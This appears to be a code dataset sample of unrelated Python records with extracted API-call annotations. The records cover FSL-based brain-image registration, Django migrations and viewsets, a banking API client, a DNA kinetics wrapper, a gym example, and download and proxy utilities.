- Transform between two images
aligned:
- Aligned output image as a nifti image file
"""
cmd = "flirt -in {} -ref {} -out {} -init {} -interp trilinear -applyxfm"
cmd = cmd.format(inp, ref, aligned, xfm)
mgu.execute_cmd(cmd, verb=True)
def apply_warp(self, inp, out, ref, warp, xfm=None, mask=None):
"""
Applies a warp from the functional to reference space
in a single step, using information about the structural->ref
mapping as well as the functional to structural mapping.
**Positional Arguments:**
inp:
- the input image to be aligned as a nifti image file.
out:
- the output aligned image.
ref:
- the image being aligned to.
warp:
- the warp from the structural to reference space.
premat:
- the affine transformation from functional to
structural space.
"""
cmd = "applywarp --ref=" + ref + " --in=" + inp + " --out=" + out +\
" --warp=" + warp
if xfm is not None:
cmd += " --premat=" + xfm
if mask is not None:
cmd += " --mask=" + mask
mgu.execute_cmd(cmd, verb=True)
def align_slices(self, dwi, corrected_dwi, idx):
"""
Performs eddy-correction (or self-alignment) of a stack of 3D images
**Positional Arguments:**
dwi:
- 4D (DTI) image volume as a nifti file
corrected_dwi:
- Corrected and aligned DTI volume in a nifti file
idx:
- Index of the first B0 volume in the stack
"""
cmd = "eddy_correct {} {} {}".format(dwi, corrected_dwi, idx)
status = mgu.execute_cmd(cmd, verb=True)
def resample(self, base, ingested, template):
"""
Resamples the image such that images which have already been aligned
in real coordinates also overlap in the image/voxel space.
**Positional Arguments**
base:
- Image to be aligned
ingested:
- Name of image after alignment
template:
- Image that is the target of the alignment
"""
# Loads images
template_im = nb.load(template)
base_im = nb.load(base)
# Aligns images
target_im = nl.resample_img(base_im,
target_affine=template_im.get_affine(),
target_shape=template_im.get_data().shape,
interpolation="nearest")
# Saves new image
nb.save(target_im, ingested)
def resample_fsl(self, base, res, template):
"""
A function to resample a base image in fsl to that of a template.
**Positional Arguments:**
base:
- the path to the base image to resample.
res:
- the filename after resampling.
template:
- the template image to align to.
"""
goal_res = int(nb.load(template).get_header().get_zooms()[0])
cmd = "flirt -in {} -ref {} -out {} -nosearch -applyisoxfm {}"
cmd = cmd.format(base, template, res, goal_res)
mgu.execute_cmd(cmd, verb=True)
def combine_xfms(self, xfm1, xfm2, xfmout):
"""
A function to combine two transformations, and output the
resulting transformation.
**Positional Arguments**
xfm1:
- the path to the first transformation
xfm2:
- the path to the second transformation
xfmout:
- the path to the output transformation
"""
cmd = "convert_xfm -omat {} -concat {} {}".format(xfmout, xfm1, xfm2)
mgu.execute_cmd(cmd, verb=True)
def func2atlas(self, func, t1w, atlas, atlas_brain, atlas_mask,
aligned_func, aligned_t1w, outdir):
"""
A function to change coordinates from the subject's
brain space to that of a template using nonlinear
registration.
**Positional Arguments:**
fun:
- the path of the preprocessed fmri image.
t1w:
- the path of the T1 scan.
atlas:
- the template atlas.
atlas_brain:
- the template brain.
atlas_mask:
- the template mask.
aligned_func:
- the name of the aligned fmri scan to produce.
aligned_t1w:
- the name of the aligned anatomical scan to produce
outdir:
- the output base directory.
"""
func_name = mgu.get_filename(func)
t1w_name = mgu.get_filename(t1w)
atlas_name = mgu.get_filename(atlas)
func2 = mgu.name_tmps(outdir, func_name, "_t1w.nii.gz")
temp_aligned = mgu.name_tmps(outdir, func_name, "_noresamp.nii.gz")
t1w_brain = mgu.name_tmps(outdir, t1w_name, "_brain.nii.gz")
xfm_t1w2temp = mgu.name_tmps(outdir, func_name, "_xfm_t1w2temp.mat")
# Applies skull stripping to T1 volume, then EPI alignment to T1
mgu.extract_brain(t1w, t1w_brain, ' -B')
self.align_epi(func, t1w, t1w_brain, func2)
self.align(t1w_brain, atlas_brain, xfm_t1w2temp)
# Only do FNIRT at 1mm or 2mm
if nb.load(atlas).get_data().shape in [(182, 218, 182), (91, 109, 91)]:
warp_t1w2temp = mgu.name_tmps(outdir, func_name,
"_warp_t1w2temp.nii.gz")
self.align_nonlinear(t1w, atlas, xfm_t1w2temp, warp_t1w2temp,
mask=atlas_mask)
self.apply_warp(func2, temp_aligned, atlas, warp_t1w2temp)
self.apply_warp(t1w, aligned_t1w, atlas, warp_t1w2temp,
mask=atlas_mask)
else:
self.applyxfm(func2, atlas, xfm_t1w2temp, temp_aligned)
self.applyxfm(t1w, atlas, xfm_t1w2temp, aligned_t1w)
self.resample(temp_aligned, aligned_func, atlas)
def dwi2atlas(self, dwi, gtab, t1w, atlas,
aligned_dwi, outdir, clean=False):
"""
Aligns two images and stores the transform between them
**Positional Arguments:**
dwi:
- Input impage to be aligned as a nifti image file
gtab:
- object containing gradient directions and strength
t1w:
- Intermediate image being aligned to as a nifti image file
atlas:
- Terminal image being aligned to as a nifti image file
aligned_dwi:
- Aligned output dwi image as a nifti image file
outdir:
- Directory for derivatives to be stored
"""
# Creates names for all intermediate files used
dwi_name = mgu.get_filename(dwi)
t1w_name = mgu.get_filename(t1w)
atlas_name = mgu.get_filename(atlas)
dwi2 = mgu.name_tmps(outdir, dwi_name, "_t2.nii.gz")
temp_aligned = mgu.name_tmps(outdir, dwi_name, "_ta.nii.gz")
temp_aligned2 = mgu.name_tmps(outdir, dwi_name, "_ta2.nii.gz")
b0 = mgu.name_tmps(outdir, dwi_name, "_b0.nii.gz")
t1w_brain = mgu.name_tmps(outdir, t1w_name, "_ss.nii.gz")
xfm = mgu.name_tmps(outdir, t1w_name,
"_" + atlas_name + "_xfm.mat")
# Align DTI volumes to each other
self.align_slices(dwi, dwi2, np.where(gtab.b0s_mask)[0][0])
# Loads DTI image in as data and extracts B0 volume
dwi_im = nb.load(dwi2)
b0_im = mgu.get_b0(gtab, dwi_im.get_data())
# Wraps B0 volume in new nifti image
b0_head = dwi_im.get_header()
b0_head.set_data_shape(b0_head.get_data_shape()[0:3])
b0_out = nb.Nifti1Image(b0_im, affine=dwi_im.get_affine(),
header=b0_head)
b0_out.update_header()
nb.save(b0_out, b0)
# Applies skull stripping to T1 volume, then EPI alignment to T1
mgu.extract_brain(t1w, t1w_brain, ' -B')
self.align_epi(dwi2, t1w, t1w_brain, temp_aligned)
# Applies linear registration from T1 to template
self.align(t1w, atlas, xfm)
# Applies combined transform to dwi image volume
self.applyxfm(temp_aligned, atlas, xfm, temp_aligned2)
self.resample(temp_aligned2, aligned_dwi, atlas)
if clean:
cmd = "rm -f {} {} {} {} {}*".format(dwi2, temp_aligned, b0,
xfm, t1w_name)
print("Cleaning temporary registration files...")
mgu.execute_cmd(cmd)
| [
"ndmg.utils.get_filename",
"nibabel.save",
"ndmg.utils.extract_brain",
"nibabel.load",
"numpy.where",
"ndmg.utils.name_tmps",
"ndmg.utils.execute_cmd"
] | [((2857, 2888), 'ndmg.utils.execute_cmd', 'mgu.execute_cmd', (['cmd'], {'verb': '(True)'}), '(cmd, verb=True)\n', (2872, 2888), True, 'import ndmg.utils as mgu\n'), ((3116, 3147), 'ndmg.utils.execute_cmd', 'mgu.execute_cmd', (['cmd'], {'verb': '(True)'}), '(cmd, verb=True)\n', (3131, 3147), True, 'import ndmg.utils as mgu\n'), ((3957, 3988), 'ndmg.utils.execute_cmd', 'mgu.execute_cmd', (['cmd'], {'verb': '(True)'}), '(cmd, verb=True)\n', (3972, 3988), True, 'import ndmg.utils as mgu\n'), ((4628, 4659), 'ndmg.utils.execute_cmd', 'mgu.execute_cmd', (['cmd'], {'verb': '(True)'}), '(cmd, verb=True)\n', (4643, 4659), True, 'import ndmg.utils as mgu\n'), ((5649, 5680), 'ndmg.utils.execute_cmd', 'mgu.execute_cmd', (['cmd'], {'verb': '(True)'}), '(cmd, verb=True)\n', (5664, 5680), True, 'import ndmg.utils as mgu\n'), ((6226, 6257), 'ndmg.utils.execute_cmd', 'mgu.execute_cmd', (['cmd'], {'verb': '(True)'}), '(cmd, verb=True)\n', (6241, 6257), True, 'import ndmg.utils as mgu\n'), ((6788, 6805), 'nibabel.load', 'nb.load', (['template'], {}), '(template)\n', (6795, 6805), True, 'import nibabel as nb\n'), ((6824, 6837), 'nibabel.load', 'nb.load', (['base'], {}), '(base)\n', (6831, 6837), True, 'import nibabel as nb\n'), ((7157, 7185), 'nibabel.save', 'nb.save', (['target_im', 'ingested'], {}), '(target_im, ingested)\n', (7164, 7185), True, 'import nibabel as nb\n'), ((7787, 7818), 'ndmg.utils.execute_cmd', 'mgu.execute_cmd', (['cmd'], {'verb': '(True)'}), '(cmd, verb=True)\n', (7802, 7818), True, 'import ndmg.utils as mgu\n'), ((8335, 8366), 'ndmg.utils.execute_cmd', 'mgu.execute_cmd', (['cmd'], {'verb': '(True)'}), '(cmd, verb=True)\n', (8350, 8366), True, 'import ndmg.utils as mgu\n'), ((9276, 9298), 'ndmg.utils.get_filename', 'mgu.get_filename', (['func'], {}), '(func)\n', (9292, 9298), True, 'import ndmg.utils as mgu\n'), ((9318, 9339), 'ndmg.utils.get_filename', 'mgu.get_filename', (['t1w'], {}), '(t1w)\n', (9334, 9339), True, 'import ndmg.utils as mgu\n'), ((9361, 9384), 'ndmg.utils.get_filename', 'mgu.get_filename', (['atlas'], {}), '(atlas)\n', (9377, 9384), True, 'import ndmg.utils as mgu\n'), ((9402, 9449), 'ndmg.utils.name_tmps', 'mgu.name_tmps', (['outdir', 'func_name', '"""_t1w.nii.gz"""'], {}), "(outdir, func_name, '_t1w.nii.gz')\n", (9415, 9449), True, 'import ndmg.utils as mgu\n'), ((9473, 9525), 'ndmg.utils.name_tmps', 'mgu.name_tmps', (['outdir', 'func_name', '"""_noresamp.nii.gz"""'], {}), "(outdir, func_name, '_noresamp.nii.gz')\n", (9486, 9525), True, 'import ndmg.utils as mgu\n'), ((9546, 9594), 'ndmg.utils.name_tmps', 'mgu.name_tmps', (['outdir', 't1w_name', '"""_brain.nii.gz"""'], {}), "(outdir, t1w_name, '_brain.nii.gz')\n", (9559, 9594), True, 'import ndmg.utils as mgu\n'), ((9618, 9671), 'ndmg.utils.name_tmps', 'mgu.name_tmps', (['outdir', 'func_name', '"""_xfm_t1w2temp.mat"""'], {}), "(outdir, func_name, '_xfm_t1w2temp.mat')\n", (9631, 9671), True, 'import ndmg.utils as mgu\n'), ((9754, 9794), 'ndmg.utils.extract_brain', 'mgu.extract_brain', (['t1w', 't1w_brain', '""" -B"""'], {}), "(t1w, t1w_brain, ' -B')\n", (9771, 9794), True, 'import ndmg.utils as mgu\n'), ((11546, 11567), 'ndmg.utils.get_filename', 'mgu.get_filename', (['dwi'], {}), '(dwi)\n', (11562, 11567), True, 'import ndmg.utils as mgu\n'), ((11587, 11608), 'ndmg.utils.get_filename', 'mgu.get_filename', (['t1w'], {}), '(t1w)\n', (11603, 11608), True, 'import ndmg.utils as mgu\n'), ((11630, 11653), 'ndmg.utils.get_filename', 'mgu.get_filename', (['atlas'], {}), '(atlas)\n', (11646, 11653), True, 'import ndmg.utils as mgu\n'), ((11670, 11715), 'ndmg.utils.name_tmps', 'mgu.name_tmps', (['outdir', 'dwi_name', '"""_t2.nii.gz"""'], {}), "(outdir, dwi_name, '_t2.nii.gz')\n", (11683, 11715), True, 'import ndmg.utils as mgu\n'), ((11739, 11784), 'ndmg.utils.name_tmps', 'mgu.name_tmps', (['outdir', 'dwi_name', '"""_ta.nii.gz"""'], {}), "(outdir, dwi_name, '_ta.nii.gz')\n", (11752, 11784), True, 'import ndmg.utils as mgu\n'), ((11809, 11855), 'ndmg.utils.name_tmps', 'mgu.name_tmps', (['outdir', 'dwi_name', '"""_ta2.nii.gz"""'], {}), "(outdir, dwi_name, '_ta2.nii.gz')\n", (11822, 11855), True, 'import ndmg.utils as mgu\n'), ((11869, 11914), 'ndmg.utils.name_tmps', 'mgu.name_tmps', (['outdir', 'dwi_name', '"""_b0.nii.gz"""'], {}), "(outdir, dwi_name, '_b0.nii.gz')\n", (11882, 11914), True, 'import ndmg.utils as mgu\n'), ((11935, 11980), 'ndmg.utils.name_tmps', 'mgu.name_tmps', (['outdir', 't1w_name', '"""_ss.nii.gz"""'], {}), "(outdir, t1w_name, '_ss.nii.gz')\n", (11948, 11980), True, 'import ndmg.utils as mgu\n'), ((11995, 12057), 'ndmg.utils.name_tmps', 'mgu.name_tmps', (['outdir', 't1w_name', "('_' + atlas_name + '_xfm.mat')"], {}), "(outdir, t1w_name, '_' + atlas_name + '_xfm.mat')\n", (12008, 12057), True, 'import ndmg.utils as mgu\n'), ((12275, 12288), 'nibabel.load', 'nb.load', (['dwi2'], {}), '(dwi2)\n', (12282, 12288), True, 'import nibabel as nb\n'), ((12641, 12660), 'nibabel.save', 'nb.save', (['b0_out', 'b0'], {}), '(b0_out, b0)\n', (12648, 12660), True, 'import nibabel as nb\n'), ((12743, 12783), 'ndmg.utils.extract_brain', 'mgu.extract_brain', (['t1w', 't1w_brain', '""" -B"""'], {}), "(t1w, t1w_brain, ' -B')\n", (12760, 12783), True, 'import ndmg.utils as mgu\n'), ((10059, 10116), 'ndmg.utils.name_tmps', 'mgu.name_tmps', (['outdir', 'func_name', '"""_warp_t1w2temp.nii.gz"""'], {}), "(outdir, func_name, '_warp_t1w2temp.nii.gz')\n", (10072, 10116), True, 'import ndmg.utils as mgu\n'), ((13346, 13366), 'ndmg.utils.execute_cmd', 'mgu.execute_cmd', (['cmd'], {}), '(cmd)\n', (13361, 13366), True, 'import ndmg.utils as mgu\n'), ((12166, 12189), 'numpy.where', 'np.where', (['gtab.b0s_mask'], {}), '(gtab.b0s_mask)\n', (12174, 12189), True, 'import numpy as np\n'), ((9962, 9976), 'nibabel.load', 'nb.load', (['atlas'], {}), '(atlas)\n', (9969, 9976), True, 'import nibabel as nb\n'), ((7605, 7622), 'nibabel.load', 'nb.load', (['template'], {}), '(template)\n', (7612, 7622), True, 'import nibabel as nb\n')] |
# Generated by Django 2.1.1 on 2018-09-22 21:45
import core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('miner', '0004_request_data'),
]
operations = [
migrations.AlterModelOptions(
name='miner',
options={'ordering': ['name', 'version'], 'verbose_name': 'Майнер'},
),
migrations.AlterModelOptions(
name='request',
options={'ordering': ['miner', 'name'], 'verbose_name': 'Запрос'},
),
migrations.AlterModelOptions(
name='server',
options={'ordering': ['name'], 'verbose_name': 'Сервер'},
),
migrations.AlterField(
model_name='miner',
name='slug',
field=models.SlugField(editable=False, help_text='A label for URL config.', max_length=63, unique=True, validators=[core.validators.validate_slug]),
),
migrations.AlterField(
model_name='request',
name='slug',
field=models.SlugField(editable=False, help_text='A label for URL config.', max_length=31, validators=[core.validators.validate_slug]),
),
migrations.AlterField(
model_name='server',
name='slug',
field=models.SlugField(editable=False, help_text='A label for URL config.', max_length=31, unique=True, validators=[core.validators.validate_slug]),
),
]
| [
"django.db.migrations.AlterModelOptions",
"django.db.models.SlugField"
] | [((250, 365), 'django.db.migrations.AlterModelOptions', 'migrations.AlterModelOptions', ([], {'name': '"""miner"""', 'options': "{'ordering': ['name', 'version'], 'verbose_name': 'Майнер'}"}), "(name='miner', options={'ordering': ['name',\n 'version'], 'verbose_name': 'Майнер'})\n", (278, 365), False, 'from django.db import migrations, models\n'), ((406, 521), 'django.db.migrations.AlterModelOptions', 'migrations.AlterModelOptions', ([], {'name': '"""request"""', 'options': "{'ordering': ['miner', 'name'], 'verbose_name': 'Запрос'}"}), "(name='request', options={'ordering': ['miner',\n 'name'], 'verbose_name': 'Запрос'})\n", (434, 521), False, 'from django.db import migrations, models\n'), ((562, 667), 'django.db.migrations.AlterModelOptions', 'migrations.AlterModelOptions', ([], {'name': '"""server"""', 'options': "{'ordering': ['name'], 'verbose_name': 'Сервер'}"}), "(name='server', options={'ordering': ['name'],\n 'verbose_name': 'Сервер'})\n", (590, 667), False, 'from django.db import migrations, models\n'), ((806, 951), 'django.db.models.SlugField', 'models.SlugField', ([], {'editable': '(False)', 'help_text': '"""A label for URL config."""', 'max_length': '(63)', 'unique': '(True)', 'validators': '[core.validators.validate_slug]'}), "(editable=False, help_text='A label for URL config.',\n max_length=63, unique=True, validators=[core.validators.validate_slug])\n", (822, 951), False, 'from django.db import migrations, models\n'), ((1068, 1200), 'django.db.models.SlugField', 'models.SlugField', ([], {'editable': '(False)', 'help_text': '"""A label for URL config."""', 'max_length': '(31)', 'validators': '[core.validators.validate_slug]'}), "(editable=False, help_text='A label for URL config.',\n max_length=31, validators=[core.validators.validate_slug])\n", (1084, 1200), False, 'from django.db import migrations, models\n'), ((1316, 1461), 'django.db.models.SlugField', 'models.SlugField', ([], {'editable': '(False)', 'help_text': '"""A label for URL config."""', 'max_length': '(31)', 'unique': '(True)', 'validators': '[core.validators.validate_slug]'}), "(editable=False, help_text='A label for URL config.',\n max_length=31, unique=True, validators=[core.validators.validate_slug])\n", (1332, 1461), False, 'from django.db import migrations, models\n')] |
from collections import namedtuple
from ibanity import Ibanity
from ibanity.Flatten import flatten_json
from ibanity.Flatten import flatten_json
def create(financial_institution_id, attributes, customer_access_token):
uri = Ibanity.client.api_schema["customer"]["financialInstitution"]["paymentInitiationRequests"] \
.replace("{financialInstitutionId}", financial_institution_id) \
.replace("{paymentInitiationRequestId}", "")
body = {
"data": {
"type": "paymentInitiationRequest",
"attributes": attributes
}
}
response = Ibanity.client.post(uri, body, {}, "Bearer " + str(customer_access_token))
return flatten_json(response["data"])
def find(financial_institution_id, id, customer_access_token):
uri = Ibanity.client.api_schema["customer"]["financialInstitution"]["paymentInitiationRequests"] \
.replace("{financialInstitutionId}", financial_institution_id) \
.replace("{paymentInitiationRequestId}", id)
response = Ibanity.client.get(uri, {}, "Bearer " + str(customer_access_token))
return flatten_json(response["data"])
| [
"ibanity.Flatten.flatten_json"
] | [((683, 713), 'ibanity.Flatten.flatten_json', 'flatten_json', (["response['data']"], {}), "(response['data'])\n", (695, 713), False, 'from ibanity.Flatten import flatten_json\n'), ((1102, 1132), 'ibanity.Flatten.flatten_json', 'flatten_json', (["response['data']"], {}), "(response['data'])\n", (1114, 1132), False, 'from ibanity.Flatten import flatten_json\n')] |
"""Multistrand wrapper"""
import os
import subprocess
import re
OUTFILE = "Logfile"
def DNAkinfold(base_infile, params):
"""
Expand (or replace) parameters in base_infile with those supplied from
the command line.
"""
in_name = base_infile + ".in"
fbase = open(base_infile, "r")
fin = open(in_name, "w")
# Copy all the file content that's not single line parameters
# and save all single line parameters to the parameter list (or ignore).
for line in fbase:
p = re.match(r"#([^=]*)=(.*)\n", line)
if p: # If it's a single line parameter
name, value = p.group(1, 2)
if name not in params: # We ignore overridden parameters.
params[name] = value
else:
fin.write(line)
fbase.close()
if OUTFILE not in params:
params[OUTFILE] = base_infile + ".out"
out_name = params[OUTFILE]
# Write out all parameters.
for name, value in list(params.items()):
fin.write("#%s=%s\n" % (name, value))
fin.close()
if os.path.isfile(out_name):
os.remove(out_name)
# Run Multistrand!
command = "Multistrand < %s" % in_name
if params["OutputInterval"] == -1: # If we say quiet, we mean it.
command += " > /dev/null"
print(command)
subprocess.check_call(command, shell=True)
if __name__ == "__main__":
import sys
try:
infile = sys.argv[1]
params = dict([arg.split("=", 1) for arg in sys.argv[2:]])
except:
print("usage: python multihelp.py infile [ARG=VAL ...]")
sys.exit(1)
DNAkinfold(infile, params)
| [
"subprocess.check_call",
"re.match",
"os.path.isfile",
"sys.exit",
"os.remove"
] | [((1004, 1028), 'os.path.isfile', 'os.path.isfile', (['out_name'], {}), '(out_name)\n', (1018, 1028), False, 'import os\n'), ((1238, 1280), 'subprocess.check_call', 'subprocess.check_call', (['command'], {'shell': '(True)'}), '(command, shell=True)\n', (1259, 1280), False, 'import subprocess\n'), ((500, 534), 're.match', 're.match', (['"""#([^=]*)=(.*)\\\\n"""', 'line'], {}), "('#([^=]*)=(.*)\\\\n', line)\n", (508, 534), False, 'import re\n'), ((1034, 1053), 'os.remove', 'os.remove', (['out_name'], {}), '(out_name)\n', (1043, 1053), False, 'import os\n'), ((1495, 1506), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1503, 1506), False, 'import sys\n')] |
import gym
env = gym.make('CartPole-v1')
env.reset()
for _ in range(1000): # run for 1000 steps
env.render()
action = env.action_space.sample() # pick a random action
env.step(action) # take action | [
"gym.make"
] | [((17, 40), 'gym.make', 'gym.make', (['"""CartPole-v1"""'], {}), "('CartPole-v1')\n", (25, 40), False, 'import gym\n')] |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.contrib.contenttypes.models import ContentType
from django_filters.rest_framework import FilterSet, CharFilter
from rest_framework import status
from rest_framework import viewsets
from rest_framework.mixins import (
ListModelMixin,
CreateModelMixin,
RetrieveModelMixin,
DestroyModelMixin,
)
from rest_framework.response import Response
from rest_framework_extensions.mixins import NestedViewSetMixin
from api.views import ViewInterfaceGenericViewSet
from cm.models import GroupConfig, Host, ObjectConfig, ConfigLog
from . import serializers
class GroupConfigFilterSet(FilterSet):
object_type = CharFilter(
field_name='object_type', label='object_type', method='filter_object_type'
)
def filter_object_type(self, queryset, name, value):
value = serializers.revert_model_name(value)
object_type = ContentType.objects.get(app_label='cm', model=value)
return queryset.filter(**{name: object_type})
class Meta:
model = GroupConfig
fields = ('object_id', 'object_type')
class GroupConfigHostViewSet(
NestedViewSetMixin,
ListModelMixin,
CreateModelMixin,
RetrieveModelMixin,
DestroyModelMixin,
viewsets.GenericViewSet,
): # pylint: disable=too-many-ancestors
queryset = Host.objects.all()
serializer_class = serializers.GroupConfigHostSerializer
lookup_url_kwarg = 'host_id'
def destroy(self, request, *args, **kwargs):
group_config = GroupConfig.obj.get(id=self.kwargs.get('parent_lookup_group_config'))
host = self.get_object()
group_config.hosts.remove(host)
return Response(status=status.HTTP_204_NO_CONTENT)
def get_serializer_context(self):
context = super().get_serializer_context()
group_config_id = self.kwargs.get('parent_lookup_group_config')
if group_config_id is not None:
group_config = GroupConfig.obj.get(id=group_config_id)
context.update({'group_config': group_config})
return context
class GroupConfigHostCandidateViewSet(
NestedViewSetMixin, viewsets.ReadOnlyModelViewSet
): # pylint: disable=too-many-ancestors
serializer_class = serializers.GroupConfigHostCandidateSerializer
lookup_url_kwarg = 'host_id'
def get_queryset(self):
group_config_id = self.kwargs.get('parent_lookup_group_config')
if group_config_id is None:
return None
group_config = GroupConfig.obj.get(id=group_config_id)
return group_config.host_candidate()
def get_serializer_context(self):
context = super().get_serializer_context()
group_config_id = self.kwargs.get('parent_lookup_group_config')
if group_config_id is not None:
group_config = GroupConfig.obj.get(id=group_config_id)
context.update({'group_config': group_config})
return context
class GroupConfigConfigViewSet(NestedViewSetMixin, RetrieveModelMixin, viewsets.GenericViewSet):
queryset = ObjectConfig.objects.all()
serializer_class = serializers.GroupConfigConfigSerializer
def get_serializer_context(self):
context = super().get_serializer_context()
group_config_id = self.kwargs.get('parent_lookup_group_config')
if group_config_id is not None:
group_config = GroupConfig.obj.get(id=group_config_id)
context.update({'group_config': group_config})
context.update({'obj_ref__group_config': group_config})
obj_ref_id = self.kwargs.get('pk')
if obj_ref_id is not None:
obj_ref = ObjectConfig.obj.get(id=obj_ref_id)
context.update({'obj_ref': obj_ref})
return context
class GroupConfigConfigLogViewSet(
NestedViewSetMixin,
RetrieveModelMixin,
ListModelMixin,
CreateModelMixin,
ViewInterfaceGenericViewSet,
): # pylint: disable=too-many-ancestors
serializer_class = serializers.GroupConfigConfigLogSerializer
ui_serializer_class = serializers.UIGroupConfigConfigLogSerializer
filterset_fields = ('id',)
ordering_fields = ('id',)
def get_queryset(self):
kwargs = {
'obj_ref__group_config': self.kwargs.get('parent_lookup_obj_ref__group_config'),
'obj_ref': self.kwargs.get('parent_lookup_obj_ref'),
}
return ConfigLog.objects.filter(**kwargs).order_by('-id')
def get_serializer_context(self):
context = super().get_serializer_context()
group_config_id = self.kwargs.get('parent_lookup_obj_ref__group_config')
if group_config_id is not None:
group_config = GroupConfig.obj.get(id=group_config_id)
context.update({'obj_ref__group_config': group_config})
obj_ref_id = self.kwargs.get('parent_lookup_obj_ref')
if obj_ref_id is not None:
obj_ref = ObjectConfig.obj.get(id=obj_ref_id)
context.update({'obj_ref': obj_ref})
return context
class GroupConfigViewSet(
NestedViewSetMixin, viewsets.ModelViewSet
): # pylint: disable=too-many-ancestors
queryset = GroupConfig.objects.all()
serializer_class = serializers.GroupConfigSerializer
filterset_class = GroupConfigFilterSet
def get_serializer_context(self):
context = super().get_serializer_context()
if self.kwargs:
context.update({'group_config': self.get_object()})
return context
| [
"cm.models.GroupConfig.obj.get",
"django.contrib.contenttypes.models.ContentType.objects.get",
"cm.models.ObjectConfig.obj.get",
"cm.models.Host.objects.all",
"rest_framework.response.Response",
"cm.models.ObjectConfig.objects.all",
"django_filters.rest_framework.CharFilter",
"cm.models.GroupConfig.objects.all",
"cm.models.ConfigLog.objects.filter"
] | [((1177, 1268), 'django_filters.rest_framework.CharFilter', 'CharFilter', ([], {'field_name': '"""object_type"""', 'label': '"""object_type"""', 'method': '"""filter_object_type"""'}), "(field_name='object_type', label='object_type', method=\n 'filter_object_type')\n", (1187, 1268), False, 'from django_filters.rest_framework import FilterSet, CharFilter\n'), ((1839, 1857), 'cm.models.Host.objects.all', 'Host.objects.all', ([], {}), '()\n', (1855, 1857), False, 'from cm.models import GroupConfig, Host, ObjectConfig, ConfigLog\n'), ((3551, 3577), 'cm.models.ObjectConfig.objects.all', 'ObjectConfig.objects.all', ([], {}), '()\n', (3575, 3577), False, 'from cm.models import GroupConfig, Host, ObjectConfig, ConfigLog\n'), ((5629, 5654), 'cm.models.GroupConfig.objects.all', 'GroupConfig.objects.all', ([], {}), '()\n', (5652, 5654), False, 'from cm.models import GroupConfig, Host, ObjectConfig, ConfigLog\n'), ((1411, 1463), 'django.contrib.contenttypes.models.ContentType.objects.get', 'ContentType.objects.get', ([], {'app_label': '"""cm"""', 'model': 'value'}), "(app_label='cm', model=value)\n", (1434, 1463), False, 'from django.contrib.contenttypes.models import ContentType\n'), ((2183, 2226), 'rest_framework.response.Response', 'Response', ([], {'status': 'status.HTTP_204_NO_CONTENT'}), '(status=status.HTTP_204_NO_CONTENT)\n', (2191, 2226), False, 'from rest_framework.response import Response\n'), ((3001, 3040), 'cm.models.GroupConfig.obj.get', 'GroupConfig.obj.get', ([], {'id': 'group_config_id'}), '(id=group_config_id)\n', (3020, 3040), False, 'from cm.models import GroupConfig, Host, ObjectConfig, ConfigLog\n'), ((2456, 2495), 'cm.models.GroupConfig.obj.get', 'GroupConfig.obj.get', ([], {'id': 'group_config_id'}), '(id=group_config_id)\n', (2475, 2495), False, 'from cm.models import GroupConfig, Host, ObjectConfig, ConfigLog\n'), ((3315, 3354), 'cm.models.GroupConfig.obj.get', 'GroupConfig.obj.get', ([], {'id': 'group_config_id'}), '(id=group_config_id)\n', (3334, 3354), False, 'from cm.models import GroupConfig, Host, ObjectConfig, ConfigLog\n'), ((3870, 3909), 'cm.models.GroupConfig.obj.get', 'GroupConfig.obj.get', ([], {'id': 'group_config_id'}), '(id=group_config_id)\n', (3889, 3909), False, 'from cm.models import GroupConfig, Host, ObjectConfig, ConfigLog\n'), ((4137, 4172), 'cm.models.ObjectConfig.obj.get', 'ObjectConfig.obj.get', ([], {'id': 'obj_ref_id'}), '(id=obj_ref_id)\n', (4157, 4172), False, 'from cm.models import GroupConfig, Host, ObjectConfig, ConfigLog\n'), ((5164, 5203), 'cm.models.GroupConfig.obj.get', 'GroupConfig.obj.get', ([], {'id': 'group_config_id'}), '(id=group_config_id)\n', (5183, 5203), False, 'from cm.models import GroupConfig, Host, ObjectConfig, ConfigLog\n'), ((5391, 5426), 'cm.models.ObjectConfig.obj.get', 'ObjectConfig.obj.get', ([], {'id': 'obj_ref_id'}), '(id=obj_ref_id)\n', (5411, 5426), False, 'from cm.models import GroupConfig, Host, ObjectConfig, ConfigLog\n'), ((4875, 4909), 'cm.models.ConfigLog.objects.filter', 'ConfigLog.objects.filter', ([], {}), '(**kwargs)\n', (4899, 4909), False, 'from cm.models import GroupConfig, Host, ObjectConfig, ConfigLog\n')] |
# -*- coding:utf-8 -*-
from __future__ import absolute_import
import logging
import os
import shutil
import subprocess
import time
from decimal import getcontext, Decimal
from urllib.request import urlopen
def set_time_zone(tz: str = "Asia/Shanghai"):
os.environ['TZ'] = tz
time.tzset()
def set_proxy(http_proxy="http://127.0.0.1:8118"):
""" 设置代理 """
os.environ["https_proxy"] = http_proxy
os.environ["HTTPS_PROXY"] = http_proxy
os.environ["http_proxy"] = http_proxy
os.environ["HTTP_PROXY"] = http_proxy
def clear_proxy_setting():
""" 取消全局代理设置 """
proxy_keys = {"HTTP_PROXY", "HTTPS_PROXY", "ALL_PROXY"}
for key in proxy_keys:
if key in os.environ:
del os.environ[key]
_key = key.lower()
if _key in os.environ:
del os.environ[_key]
def download_big_file(url, target_file_name):
"""
使用python核心库下载大文件
ref: https://stackoverflow.com/questions/1517616/stream-large-binary-files-with-urllib2-to-file
"""
response = urlopen(url)
chunk = 16 * 1024
with open(target_file_name, 'wb') as f:
while True:
chunk = response.read(chunk)
if not chunk:
break
f.write(chunk)
def download_big_file_with_wget(url, target_file_name):
"""
使用wget下载大文件
Note: 需要系统安装wget
"""
download_process = subprocess.Popen(["wget", "-c", "-O", target_file_name, "'{}'".format(url)])
download_process.wait()
if not os.path.exists(target_file_name):
raise Exception("fail to download file from {}".format(url))
def remove_path_or_file(path_or_file_name):
"""
删除文件
"""
if not os.path.exists(path_or_file_name):
logging.warning("{} not exists!".format(path_or_file_name))
return
if os.path.isdir(path_or_file_name):
# dir
shutil.rmtree(path_or_file_name)
else:
# file
os.remove(path_or_file_name)
def get_pretty_float(num: float, count: int = 2) -> str:
"""
指定有效数字的科学计数法显示
Args:
num: float
